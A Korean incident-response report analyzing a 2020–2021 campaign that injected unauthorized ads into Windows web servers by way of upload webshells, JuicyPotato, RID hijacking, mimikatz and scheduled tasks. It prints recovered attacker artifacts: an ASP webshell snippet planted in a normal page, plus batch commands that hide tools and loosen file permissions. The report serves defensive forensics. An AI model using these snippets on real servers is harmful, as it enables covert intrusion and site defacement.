2021-06

비정상  광고삽입  침해사고  사례  및  대응방안

웹서버  관리자가  퇴근하면  일어나는  무단광고노출 

Ⅰ.  서론 ·········································································································· 1

Ⅱ.  본론 ·········································································································· 3

    A.  사고  개요 ································································································ 3

    B.  공격  사례 ································································································ 5

    C.  대응  방안 ······························································································ 25

Ⅲ.  결론 ········································································································ 29

참고.  공격지표  IoC  ···················································································· 30

본  보고서의  내용에  대해  진흥원의  허가  없이  무단전재  및  복사를 

금하며,  위반  시  저작권법에  저촉될  수  있습니다.

집        필  :  침해사고분석단  사고분석팀

                      박철민  책임,  임정호  수석

                     김광연  팀장

감        수  :  신대규  본부장,  임진수  단장

Korea  Internet  &  Security  Agency

1

Ⅰ.  서론

1.  피해기업  인터뷰

    모기업  홈페이지에  무단  광고삽입  침해사고가  발생하였다.  피해기업은  변조된  웹 
페이지에서  광고  코드*를  삭제하여  정상  페이지로  복원한  후  서비스하였다.

※  광고  프로그램이  사용하는  고유키

웹사이트에  아래  광고  코드만  삽입하면,  광고  프로그램은  광고풀에서  해당  웹페이지와  연광성이  높은  광고를  노출한다.

<script  data-ad-client="ca-pub-고유키값"  async  src="https://pagead2.**********/pagead/js/********.js"></script>

참고로,  광고수익  체계는  웹사이트  방문자가  광고를  클릭하면  광고  게시자는  광고  프로그램  제조사에  광고비를  지급하고, 

광고  프로그램  제조사는  이렇게  모은  광고비를  웹사이트  제작자(광고  코드  소유자)와  나누는  형식으로  이뤄진다.

    몇  시간  후  피해기업  홈페이지  방문자가  무단  광고노출을  발견하여  해당기업에 

제보하였다.  제보즉시  웹서버  관리자가  서버에  접속하여  해당  페이지  소스코드를 

살펴보았으나  정상이었다.

    웹서버 관리자는 제보한 고객 웹브라우저에서 쿠키값 삭제를 요청하였고 고객으로 부터 

"이제 정상이다" 라는 답변을 받았다. 퇴근한 웹서버 관리자에게 비슷한 사고제보가 이어졌다.

    피해기업은 제보와 관련하여 서버를 조사하였으나 웹페이지 변조, 악성코드 등 별다른 

침해흔적을  발견할  수  없었다.

2.  광고노출  동작방식

    공격자는 침투를 들키지 않기 위해 2개의 작업 스케줄(CredentialTask, CertificateTask)을 등록하였다.

    변조용  작업스케줄(CredentialTask)은  관리자  퇴근을  고려한  아래  조건에  하나라도 

만족하면  정상페이지를    광고  코드가  삽입된  페이지로  변경하는  배치파일(winrmr.cmd, 

상세기능은  II.6.라  참조)을  실행한다.

1.  매일  오후  18:00  일  때

2.  매일  오후  20:00  일  때

3.  서버에  관리자가  로그오프할  때

4.  원격데스크톱  세션연결  해제할  때

5.  워크스테이션  잠금  시

  *  침해사고별로  변조  조건이  조금씩  다르나  모두  합치면  위와  같음

                   
                                                                                               
 
Korea  Internet  &  Security  Agency

2

    원상복구용(이하,  원복용)  작업스케줄(CertificateTask)은  관리자가  서버에  접속하는  경우들을 

아래와  같이  산정하여  조건이  하나라도  만족하면  광고  코드가  삽입된  변조  페이지를 

정상  페이지로  복원하는  배치파일(winrsr.cmd,  상세기능은  II.6.라  참조)을  실행한다.

1.  매일  아침  07:50  일  때

2.  서버에  관리자가  로그온할  때

3.  원격데스크톱  세션  연결할  때

4.  로컬에서  사용자  세션  연결할  때

5.  잠금  해제  시

  *  침해사고별로  원복  조건이  조금씩  다르나  모두  합치면  위와  같음

3.  다수  피해기업  그러나  동일  공격지표

    `21년 상반기에 발생한 광고 무단 삽입 침해사고에 대해 한국인터넷진흥원이 분석했던 

피해서버들은 피해기업이 모두 달랐으며, 공격자가 사용한  광고 코드 또한 상이하였다. 

최초  공격시점  또한  `20년  5월부터  현재까지  다양했다.

    하지만 무단  광고삽입에 사용된 파일들은  모든 서버에서 발견되었으며,  해시값까지 동일했다.

    아울러,  웹셸을  통해  관리자  권한의  명령을  실행하는  명령어실행도구인  Sy_Runas.exe

(상세기능은  II.6  참조)  또한  모든  서버에서  발견하였다. 

      광고삽입  침해사고는  모두  윈도우  서버  운영체제를  대상으로만  일어났지만  피해 

버전은  win2012R2  및  win2016이  주를  이루었다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

3

Ⅱ.  본론  –  A.  사고  개요

1.  공격  줄거리

[  침해사고  개요도  ]

    공격자는 웹서버에 방치된 게시판의 파일업로드 취약점을 악용하여 웹셸을 업로드하였고, 
권한상승도구로 시스템 권한을 획득하였다. 공격자는 획득한 시스템 권한으로 게스트 계정에 

관리자권한을  부여하였고,  계정탈취도구로  관리자  계정정보를  얻었다.

    이후 공격자는 관리자 계정정보를 활용하여 명령어실행도구를 통해  광고 코드가 삽입된 

비정상  페이지를  게시하는  스케줄을  등록하였다. 

    관리자가 피해서버 접속에서 벗어나면, 공격자는 홈페이지 방문자에게  광고를 노출하여 
수익을  얻었다. 

                   
                                                                                               
Korea  Internet  &  Security  Agency

4

2.  ATT&CK  Matrix

    ATT&CK  Matrix로  살펴본  침투단계별  주요내용은  아래와  같다.

    □1   Initial  Access  :  최초  침투

          웹  취약점(파일업로드)을  이용해  1차  웹셸을  업로드하여  침투  기반을  마련

    □2   Persistence  :  지속성  유지

          1차 웹셸로 업로드 경로가 아닌 일반 경로에 2차 웹셸을 업로드하여 공격의 지속성을 확보

    □3   Privilege  Escalation  :  권한  상승

          2차  웹셸로  권한상승도구를  실행하여  시스템  권한을  획득

    □4   Persistence  :  지속성  유지

          사전에 획득한 시스템 권한으로 권한복사도구를 실행하여 게스트 계정에 관리자 권한을 부여

    □5   Credential  Access  :  계정정보  확보

          시스템  권한을  이용하여  계정탈취도구를  실행한  후  관리자  계정정보를  탈취

    □6   Privilege  Escalation  :  권한  상승

          탈취한 계정정보를 명령어실행도구에 입력하여 해당 계정의 권한으로 윈도우 운영체제 

내부  명령어를  실행

    □7   Collection  :  정보  수집

          광고  삽입  및  원복을  위한  웹  페이지  원본  파일  수집  등

          Defense  :  추적  회피

          명령어실행도구의  파일  속성을  숨김파일  및  시스템파일로  변경하여  탐지  회피

          Persistence  :  지속성  유지

          정상  웹페이지에  스크립트를  삽입하여  3차  웹셸로  악용

    □8   Impact  :  광고  노출

          명령어실행도구를 활용하여 광고 코드가 삽입된 페이지들이 나타나도록 작업스케줄을 등록

                   
                                                                                               
 
 
         
         
Korea  Internet  &  Security  Agency

5

Ⅱ.  본론  –  B.  공격  사례

1.  Initial  Access  :  최초침투

□  웹취약점(파일업로드)을  이용한  1차  웹셸  업로드

공격자는  홈페이지  업로드  취약점을  이용하여  웹셸을  업로드한다.

    공격자는  피해기업  홈페이지  이미지  업로드  게시판의  첨부기능을  이용해  첫번째 

웹셸(Yd0uaERJppqLjWqj.asp)을  업로드  하였다.

[  공격자가  웹셸  업로드  시  악용한  게시판  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

6

출처:  WEBLOG  (UTC+0)

#Fields:  date  time  s-ip  cs-method  cs-uri-stem  cs-uri-query  s-port  cs-username  c-ip  cs(User-Agent) 

cs(Referer)  sc-status  sc-substatus  sc-win32-status  time-taken

2020-11-28  13:00:36  175.x.x.x  POST  /_include/js/cheditor/imageupload/upload.asp  -  80  -  27.10x.x.x 

Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/

86.0.4240.198+Safari/537.36  -  200  0  0  0

2020-11-28  13:00:43  175.x.x.x  GET  /nbg_upload/editor_attach/Yd0uaERJppqLjWqj.asp  -  80  -  27.10x.

x.x  Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chro

me/86.0.4240.198+Safari/537.36  -  200  0  0  15

[  게시판의  파일업로드  취약점을  악용한  1차  웹셸  업로드  관련  웹로그(UTC+0)  ]

※  웹로그에  기록된  피해서버  IP주소  및  레퍼러,  공격  IP주소를  통해  기업명이  식별될  수  있어서  “x”  기호로  마스킹  처리하였다. 

이후  웹로그에도  준용했다.

    관리자는  한국인터넷진흥원으로부터  침해사고  분석결과를  받고서야  자사에서  운영하는 

홈페이지에  취약한  파일업로드  페이지가  존재하고  있다는  것을  처음으로  인지했다.

2.  Persistence  :  지속

□  2차  웹셸(1.asp)  업로드

공격자는  업로드  경로에  있는  1차  웹셸을  이용하여  업로드  경로가  아닌  일반  경로에  2차  웹셸

(1.asp)을  업로드하여  관리자의  악성파일  탐지를  회피하고자  했다. 

    공격자는  1차  웹셸을  이용해  2차  웹셸(1.asp)을  업로드  하였다.  관리자의  웹셸탐지를 

회피하기  위해,  공격자는  게시판의  파일업로드  경로가  아닌  일반  경로에  추가  웹셸을 

생성했다.

출처:  WEBLOG  (UTC+0)

2020-11-28  13:02:18  175.x.x.x  POST  /nbg_upload/editor_attach/Yd0uaERJppqLjWqj.asp  -  80  -  27.1

0x.x.x  Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+C

hrome/87.0.4280.66+Safari/537.36  http://www.x.x.kr/200  0  0  93

2020-11-28  13:02:47  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.3

6  http://www.x.x.kr/200  0  0  31

[  1차  웹셸을  이용한  2차  웹셸(1.asp)  업로드  관련  웹로그(UTC+0)  ]

                   
                                                                                               
   
Korea  Internet  &  Security  Agency

7

3.  Privilege  Escalation  :  권한  상승

□  권한상승도구(JuicyPotato)  생성  및  실행

공격자는  2차  웹셸(1.asp)을  이용하여  권한상승도구(JuicyPotato)를  생성하였다. 

해당도구  실행을  통해  공격자는  시스템권한을  획득하였다.

    공격자는  2차  웹셸(1.asp)을  이용해  윈도우  운영체제의  SYSTEM  권한상승도구인 

JuicyPotato(jpms.exe)를  업로드  하였다.

출처:  WEBLOG  (UTC+0)

2020-11-28  13:04:38  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.

36  http://www.x.x.kr/200  0  0  15

[  2차  웹셸(1.asp)을  이용한  권한상승도구  업로드  관련  웹로그(UTC+0)  ]

    이어서  공격자는  권한상승도구(jpms.exe)를  실행하여  SYSTEM  권한을  획득하여  추가 

공격인프라  설치  교두보를  확보한  후  자신의  침투흔적을  남기지  않기  위해 

권한상승도구(jpms.exe)를  삭제하였다.

출처:  Amcache  (UTC+9)

[  권한상승도구  생성시간  및  실행시간  관련  실행로그  ]

※ 공격자는 자신의 침투흔적을 남기지 않기 위해 jpms.exe를 삭제하였고 메타데이터($MFT, Master File Table)에서도 해당기록이 부재하였다. 

웹셸로 생성된 PE파일은 (지속적으로 수정이 가능한 문서파일과 달리) 생성시간과 수정시간이 동일하므로 실행로그에 남은 수정시간으로 

생성시간을  특정하였다.  이후에  기술할  나머지  실행파일도  본  설명을  준용한다.

4.  Persistence  :  지속성  유지

□  권한복사도구(UserClone)  생성  등

공격자는  2차  웹셸(1.asp)을  이용하여  권한복사도구(UserClone)를  생성하였다. 

권한복사도구로  공격자는  게스트  계정에  관리자  계정의  권한을  부여한다.

    공격자는  2차  웹셸(1.asp)을  이용해  권한복사도구인  UserClone.exe를  생성하였다. 

                   
                                                                                               
     
       
     
Korea  Internet  &  Security  Agency

8

출처:  WEBLOG  (UTC+0)

2020-11-28  13:05:57  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.

36  http://www.x.x.kr/200  0  0  15

[  2차  웹셸을  이용한  권한복사도구  업로드  관련  웹로그(UTC+0)  ]

    이어서  공격자는  권한복사도구를  실행하여  윈도우  운영체제의  기본계정  중  Guest에 

Administrator의  권한을  부여하였다.

출처:  Amcache  (UTC+9)

[  권한복사도구  생성시간  및  실행시간  관련  실행로그  ]

  UserClone.exe은  레지스트리 

SAM에  기재된  Guest  계정의  RID값 

501을 

Administrator의  RID값인  500으로  변경한다.  공격자는  권한상승관련  사전공격을 

기반으로  SYSTEM  권한을  획득하였기에  권한복사도구  실행으로  레지스트리  키값을 

변경할  수  있었다.

출처:  SAM

[  SAM  변경결과  ]

5.  Credential  Access  :  계정정보  확보

□  계정탈취도구(mimikatz)  생성  및  실행

공격자는  2차  웹셸(1.asp)을  이용하여  계정탈취도구인  mimikatz를  생성하였다. 

해당도구  실행을  통해  공격자는  관리자  계정의  접속정보를  탈취하였다.

    공격자는  2차  웹셸(1.asp)을  이용해  윈도우  운영체제의  계정탈취도구인  mimikatz( 

                   
                                                                                               
     
Korea  Internet  &  Security  Agency

9

mz64_ms_all.exe)를  생성하였다.

출처:  WEBLOG  (UTC+0)

2020-11-28  13:06:19  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.

36  http://www.x.x.kr/200  0  0  15

[  2차  웹셸(1.asp)을  이용한  계정탈취도구  업로드  관련  웹로그(UTC+0)  ]

    이어서  공격자는  권한상승  관련  사전공격을  기반으로  계정탈취도구를  실행하여 

윈도우  계정별  이름  및  비밀번호를  수집한  후  공격흔적을  남기지  않기  위해 

mz64_ms_all.exe를  삭제하였다.

출처:  Amcache  (UTC+9)

[  계정탈취도구  생성시간  및  실행시간  관련  실행로그  ]

6.  Privilege  Escalation  :  권한  상승

□  명령어실행도구(Sy_Runas)  생성  및  실행

공격자는  2차  웹셸(1.asp)을  이용하여  명령어실행도구(Sy_Runas)를  생성하였다. 

공격자는  웹셸로  명령어실행도구를  실행할  수  있으며,  웹셸로  입력했던  윈도우  계정권한으로  운영

체제  내부명령어를  실행한다.

    공격자는  2차  웹셸(1.asp)을  이용해  윈도우  운영체제의  명령어실행도구인  Sy_Runas를 

wiatrace.log  이름으로  생성하였다.  (공격자는  정상파일  wiatrace.log에  덮여쓰워  Sy_Runas를 

wiatrace.log  파일명으로  생성)

출처:  WEBLOG  (UTC+0)

2020-11-28  13:07:24  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.

36  http://www.x.x.kr/  200  0  0  140

[  2차  웹셸을  이용한  명령어실행도구  접근  관련  웹로그(UTC+0)  ]

                   
                                                                                               
     
Korea  Internet  &  Security  Agency

10

출처:  $MFT  (UTC+0)

[  명령어실행도구  접근시간  관련  메타정보  ]

    공격자는  명령어실행도구를  웹셸을  통해  생성하였기  때문에,  해당파일의  소유자로 

웹계정명인  IUSR를  아래와  같이  확인할  수  있었다.

출처:  wiatrace.log  속성창

[  명령어실행도구  소유자  ]

    명령어실행도구는  공격자가  웹셸을  통해  입력한  윈도우  계정정보(계정명,  비밀번호)  및 

명령어를  인자값으로  받아  입력한  계정의  권한으로  윈도우  시스템  명령어를  실행한다. 

※  8.  Impact  부분에서  3차  웹셸로  명령어실행도구  사용흔적을  확인할  수  있다.

    이때  공격자는  윈도우  계정탈취  관련  사전공격을  기반으로  획득한  계정명  및 

비밀번호를  활용한다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

11

출처:  샘플  코드분석  일부-실행파일  사용법  관련

[  명령어실행도구  사용방법  관련  코드분석  ]

출처:  샘플  코드분석  일부-계정정보를  토대로  해당  계정권한  실행  관련

[  명령어실행도구  계정정보  기반  해당권한  실행  관련  코드분석  ]

7.  Collection  +  Defense  Evasion + Persistence : 정보  수집  +  추적 회피  +  지속성 유지

□  공격도구모음  생성  및  실행

공격자는  2차  웹셸(1.asp)을  이용하여  공격도구모음  17개  파일을  생성하였다. 

17개  파일은  기능에  따라  4개  그룹으로  구성된다.

그룹Ⅰ은  FTP관련,  그룹Ⅱ은  은닉관련,  그룹Ⅲ은  백업관련,  그룹Ⅳ은  광고  삽입  관련이다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

12

    공격자는  2차  웹셸(1.asp)을  이용해  명령어실행도구를  설치한  폴더에  아래와  같은  총 

17개  파일을  순차적으로  생성하고  이후  실행  및  삭제하였다.

    삭제된  파일  중  일부  파일을  복구하여  확인한  파일  기능별  관계도는  아래와  같다.

출처:  $MFT

[Group  Ⅰ]  FTP  정보수집  관련  4종  파일

ftp.vbe---ftp.bat---go.vbe---ftp.txt

[Group  Ⅱ]  명령어실행도구  은닉  관련  1종  파일

wiatrace.log---1.bat

[Group  Ⅲ]  웹소스  파일  백업  관련  5종  파일

BackupFile_1.0.1M.bat  --┐

                                              |---pl.bat---pl.vbs---OperationRecord.log

File.txt  -------------------┘

[Group  Ⅳ]  광고  삽입·원복  관련  7종  파일

winrnr.cmd----┐

                            |

winsrs.cmd----  ·

                            |

winrmr.vbs----  ·

                            |---copy.bat

winsrs.exe-----  ·

                            |

winrsr.cmd----  ·

                            |

winrmr.cmd ---┘

*  흑색:  복구한  파일내용에서  관계  파일명들이  직접적으로  언급되어  있음

*  회색:  복구한  파일내용에  직접  언급은  없지만,  파일명·기능  및  생성시간,  웹셸  호출이력  등으로  파일간  관계를  추정하여  도식함

[  C:\Windows\debug\WIA  폴더  내  파일  간  관계도  ]

가.  [그룹Ⅰ  그리고  그룹Ⅲ]  “Collection  :  정보  수집”  관련

공격자는  2차  웹셸(1.asp)을  이용하여  FTP  정보수집  및  웹소스  백업  관련  파일들을  생성하였다. 

    그룹Ⅰ·Ⅲ  총  9개  파일들  중  “OperationRecord.log는  ”정보  수집“  단계를  보여주는 

예시  파일로  (공격자가  변조하여  3차  웹셸로  사용하게  될)  정상  웹페이지  overview.asp를  백업

하였다는  내용이  담겨있다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

13

출처:  $MFT

2020-11-28  22:48:04.00  -  The  file  you  specified  "E:\Inetpub\*******\eng\business\overview.asp
"  has  been  backed  up

-  “*******”  부분은  피해기업명이  식별될  수  있어서  마스킹  처리함

[  OperationRecord.log  파일복구  내용  ]

나.  [그룹Ⅱ]  “Defense  Evasion  :  추적  회피“  관련

공격자는  2차  웹셸(1.asp)을  이용하여  1.bat을  생성하였다. 
1.bat의  주요기능은  명령어실행도구의  속성을  숨김  및  읽기전용,  시스템파일로  변경한다.

    그룹Ⅱ의  대표  파일인  1.bat는  명령어실행도구(Sy_Runas로  알려진)  wiatrace.log  파일을 

대상으로  숨김  및  읽기전용,  시스템파일로  변경하고,  대상파일에  대한  접근제어를  수정

하여  users(윈도우  기본  그룹  중  사용자  그룹)  사용자에게  읽기  권한을  부여한다.  이를  통해 

공격자는  명령어실행도구에  대한  관리자의  탐지를  회피하고자  했다.

출처:  $MFT

echo  y|attrib  C:\Windows\debug\WIA\wiatrace.log  +h  +r  +s  /d  /s
echo  y|Cacls  "C:\Windows\debug\WIA\wiatrace.log"  /g  users:r

[  1.bat  파일복구  내용  ]

    명령어실행도구의  변경된  속성값을  아래와  같이  확인할  수  있었다.
※  RHSA(Read-only/Hidden/System/Archive)  :  읽기전용  및  숨김,  시스템파일  등

출처:  wiatrace.log  속성창

[  명령어실행도구  특성  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

14

다.  [그룹Ⅳ]  “Defense  Evasion  +  Persistence  :  추적  회피  +  지속성  유지”  관련

공격자는  2차  웹셸(1.asp)로  광고  삽입·원복  관련  6개  파일(이하,  광고삽입인프라)  및  copy.bat을  생성하였다.

copy.bat는  광고삽입인프라  전체를  신규경로인  시스템  폴더(SysWOW64)에  복사한다.

공격자는  광고삽입인프라의  각  파일명을  처음부터  SysWOW64  폴더  하위의  정상파일  이름들과 

유사하게  작성하여  관리자의  탐지로부터  회피하고자  하였다.

광고삽입인프라  중  2개  압축파일에는  정상  웹페이지를  변조한  3차  웹셸이  포함되어  있다.

    공격도구모음  중  마지막  그룹은  서론에  기술한  광고삽입인프라  생성과  관련  있다. 

공격자는  2차  웹셸(1.asp)로  광고삽입인프라  6개  파일  및  파일복사  배치파일  copy.bat을 

생성하였다. 

    copy.bat를 실행하면 광고삽입인프라 전체 파일들이 기존 공격도구모음 경로에서 신규 

경로인  시스템  폴더  %SystmeRoot%\SysWOW64로  복사된다.

    복사될  신규경로에는  시스템  파일들이  다수  존재하고  있으므로,  공격자는  의도적으로 

광고삽입인프라에  사용된  파일명들을  신규경로인  시스템  폴더의  기존  정상파일명들과 

유사하게 작성하였다. 공격자는 이러한 방식으로 관리자의 모니터링으로부터 공격도구에 

대한  탐지를  회피했다. 

    광고삽입인프라의  6개  파일별  세부내용은  8.  Impact  부분에서  다루고,  여기서는  파일

복사  배치파일  및  3차  웹셸  관련  사항만  기재한다.

    공격자는  2차  웹셸(1.asp)을  이용해  copy.bat를  생성하였다. 

출처:  WEBLOG  (UTC+0)

2020-11-28  13:49:44  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT

+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.

36  http://www.x.x.kr/  200  0  0  31

[  2차  웹셸(1.asp)을  이용한  copy.bat  생성관련  웹로그(UTC+0)  ]

출처:  $MFT  (UTC+0)

[  copy.bat  생성시간  관련  메타정보  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

15

    copy.bat는  상주파일이라  메타데이터($MFT)에서  복구한  파일내용은  아래와  같다. 

copy.bat  파일은  광고삽입인프라  전체  6개  파일을  신규경로에  복사한다. 

    copy.bat는  winrmr.cmd(광고삽입인프라  중  변조용  배치스크립트)파일에  대한  접근제어를 

수정한다.  users(윈도우  기본  그룹  중  사용자  그룹)  사용자에게  이전에  허용된  모든  명시적 

사용  권한을  무시하고  모든  권한을  부여한다. 

출처:  $MFT

copy  C:\Windows\debug\WIA\winrmr.cmd  C:\Windows\SysWOW64\

copy  C:\Windows\debug\WIA\winsrs.exe  C:\Windows\SysWOW64\

copy  C:\Windows\debug\WIA\winrmr.vbs  C:\Windows\SysWOW64\

copy  C:\Windows\debug\WIA\winrnr.cmd  C:\Windows\SysWOW64\

copy  C:\Windows\debug\WIA\winrsr.cmd  C:\Windows\SysWOW64\

copy  C:\Windows\debug\WIA\winsrs.cmd  C:\Windows\SysWOW64\

icacls  C:\Windows\SysWOW64\winrmr.cmd  /grant:r  users:f

[  copy.bat  파일복구  내용  ]

    압축파일  winrnr.cmd  및  winsrs.cmd에는  정상  웹페이지  overview.asp에  웹셸  수행이 

가능하도록  아래와  같이  몇  줄  스크립트가  추가되어  변조된  상태로  보관되어  있었다.

출처:  overview.asp  소스코드  일부

                                                                  a  =  request("  ")

                                                                  b  =  Left(Ucase(a)&"",99999)

                                                                  execute(b)

[  3차  웹셸  악성  스크립트  내용  ]

    공격자는 정상 웹페이지를 변조한 overview.asp를 3차 웹셸로 사용하여 관리자 탐지를 

더  효과적으로  회피하려고  했으며,  결과적으로  공격  지속성을  높였다. 

    공격자의  3차  웹셸  최초  사용  시점은  광고  노출을  위해  작업  스케줄  등록  시 

명령어실행도구를  호출할  때이며,  자세한  내용은  8.  Impact  부분에서  다룬다.

                   
                                                                                               
Korea  Internet  &  Security  Agency

16

8.  Impact  :  광고  노출

□  광고삽입인프라  구축

공격자는  2차  웹셸(1.asp)로  명령어실행도구를  이용하여  copy.bat을  실행하였다.

광고삽입인프라  6개  전체파일이  copy.bat에  기재된  순서대로  신규경로  SysWOW64에  복사되었다.

공격자는  3차웹셸로  명령어실행도구를  이용하여  작업스케줄을  등록하였다.

작업스케줄  조건에  맞춰    광고  코드가  삽입된  비정상  페이지가  배포되었다.

[  광고삽입인프라  동작  개요도  ]

    공격자는 2차 웹셸(1.asp)로 명령어실행도구를 이용해 copy.bat 배치파일을 실행하였다. 

이를  통해  광고삽입인프라  전체파일이  신규경로에  복사되었다.

                   
                                                                                               
     
Korea  Internet  &  Security  Agency

17

출처:  WEBLOG  (UTC+0)

2020-11-28  13:49:50  175.x.x.x  POST  /images/bg/1.asp  -  80  -  27.10x.x.x  Mozilla/5.0+(Windows+NT
+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.66+Safari/537.
36  http://www.x.x.kr/  200  0  0  171

[  2차  웹셸로  copy.bat  실행  관련  웹로그(UTC+0)  ]

출처:  $MFT  (UTC+0)

[  신규경로에  첫  번째로  복사된  winrmr.cmd의  생성시간  관련  메타정보  ]

    공격자는  관리자계정권한으로  명령어실행도구를  이용했기  때문에,  winrmr.cmd의 

소유자는  Administrators이었다.  (나머지  광고삽입인프라도  동일)

출처:  winrmr.cmd  속성창

[  winrmr.cmd  소유자  ]

    광고삽입인프라 전체 6개 파일은 copy.bat에 기재된 순서대로 아래와 같이 신규경로인 

시스템  폴더  %SystmeRoot%\SysWOW64에  복사되었다.

  *  파일복사  순서:  winrmr.cmd  →  winsrs.exe  →  winrmr.vbs  →  winrnr.cmd  →  winrsr.cmd  →  winsrs.cmd

                   
                                                                                               
Korea  Internet  &  Security  Agency

18

    광고삽입인프라  상세내용은  이해의  편의를  위해,  파일간  의존성이  낮은  아래와  같은 

순서로  설명한다.

  *  파일설명  순서:  winsrs.exe  →  winrmr.vbs  →  winsrs.cmd(winrnr.cmd)  →  winrmr.cmd(winrsr.cmd)

  ◌  압축해제  프로그램  winsrs.exe

winsrs.exe는  정상적인  압축프로그램이다.

공격자는  원복  및  변조  배치파일로  압축프로그램을  호출하여  원복  및  변조  압축파일을  압축  해제한다.

    winsrs.exe는  압축프로그램(RAR.exe)  버전  5.91의  정상  실행파일이다. 

출처:  winsrs.exe  속성창  및  사용법

[  winsrs.exe  설명  및  사용법  ]

    공격자는  winsrs.exe에  3가지  옵션을  사용하여,  압축해제  비밀번호  입력  및  덮어쓰기 

허용,  프로그램  메시지  비활성화를  수행하였다.

출처:  원복  및  변조  배치파일(winrsr.cmd  및  winrmr.cmd)  파일내용  일부

(생략)
winsrs  e  "%ResBAK%"  -hp"    "  "%~1"  -o+  -idcq  >nul  2>nul

[  원복  및  변조  배치파일에  기록된  winsrs.exe  관련부분  ]

                   
                                                                                               
Korea  Internet  &  Security  Agency

19

  ◌  해시값을  구하는  winrmr.vbs

winrmr.vbs는  파일의  MD5  해시값을  구하는  VB스크립트  파일이다.

    공격자는  소스코드  공개사이트*에  게시된  MD5  해시값을  구하는  VB스크립트와  거의 

동일한  내용으로  코드를  작성하였다.

*  https://developpaper.com/vbs-gets-md5-value-of-file-component-free/

출처:  winrmr.vbs  파일내용  일부

(생략)

Set  file_hash  =  wi.FileHash(file_name,  0)

(생략)

[  winrmr.vbs에  기록된  해시값  관련부분  ]

  ◌  정상  웹페이지들과  3차  웹셸이  압축되어  있는  winsrs.cmd

winrsr.cmd는  정상  웹페이지들과  3차  웹셸  파일,  설정  파일  등으로  구성된  RAR  압축파일이다.

    winrsr.cmd는  비밀번호가  걸려있는  RAR  압축파일이다.

※  비밀번호는  원복  배치파일인  winrsr.cmd에  기재되어  있음

출처:  winsrs.cmd

[  winsrs.cmd  압축파일의  구성파일  목록  ]

    winrsr.cmd 압축파일 중 SCFNum.dat는 숫자만 기록된 텍스트 파일이다. 그 숫자는 5이며, 

SCF[숫자].dat  파일의  총  개수를  가리킨다.

    winrsr.cmd  압축파일  중  SCFConfig.dat는  3가지  종류의  값이  기록된  텍스트  파일이다. 

                   
                                                                                               
     
Korea  Internet  &  Security  Agency

20

출처:  SCFConfig.dat

SCF1.dat|“E:\Inetpub\*******\eng\business\overview.asp”|4459A69DF1F434C0447481FBD9ECC730

SCF2.dat|“E:\web\m.*******\inc\js\jquery-1.11.0.min.js”|8FC25E27D42774AEAE6EDBC0A18B72AA

SCF3.dat|“E:\web\m.*******\inc\js\jquery-1.12.4.min.js”|4F252523D4AF0B478C810C2547A63E19

SCF4.dat|“E:\web\*******\_js\jquery.easing.1.3.js”|6516449ED5089677ED3D7E2F11FC8942

SCF5.dat|“E:\web\*******\Scripts\TweenMax.min..js”|E8BBEE2CBFF1B997EAE9A5D623C6A410

-  “*******”  부분은  피해기업명이  식별될  수  있어서  마스킹  처리함

[  SCFConfig.dat  파일내용  ]

    설정파일인  SCFConfig.dat에는  구분자  "|"를  기준으로,  첫  번째  필드는  정상  웹페이지 

파일명이 SCF[숫자].dat으로 기록되어 있고, 두 번째 필드는 정상 웹페이지 파일의 드라이브명, 

경로와 이름이 기재되어 있고, 마지막 필드는 정상 웹페이지의 MD5 해시값이 쓰여 있다. 

이러한  설정값들은  원복  배치파일인  winrsr.cmd가  사용하는  인자값으로  사용된다.

    winrsr.cmd  압축파일  중  SCF[숫자].dat는  정상  웹페이지  파일이다.  단,  SCF1.dat는 

예외적으로  정상  웹페이지에  스크립트가  삽입된  비정상  웹셸  파일이다.(상세내용은  7.다. 

overview.asp  참조)

    정리하면,  winrsr.cmd는  원복용  압축파일이다.

  ◌  광고  코드가  삽입된  웹페이지들과  3차  웹셸이  압축되어  있는  winrnr.cmd

winrnr.cmd는  광고페이지들과  3차  웹셸  파일,  설정  파일  등으로  구성된  RAR  압축파일이다.

    winrnr.cmd는  비밀번호가  걸려있는  RAR  압축파일이다.(비밀번호는  변조  배치파일인 

winrmr.cmd에  기재되어  있음)  즉,  winrnr.cmd는  변조용  압축파일이다.

    변조용  압축파일인  winrnr.cmd는  원복용  압축파일인  winsrs.cmd와  동일한  구성이며, 

차이점으로는  SCF[숫자].dat  파일들이  정상  웹페이지에    광고  코드가  삽입되어  있으므로 

원복용  압축파일의  SCF[숫자].dat들과  해시값이  상이하다는  것이다. 

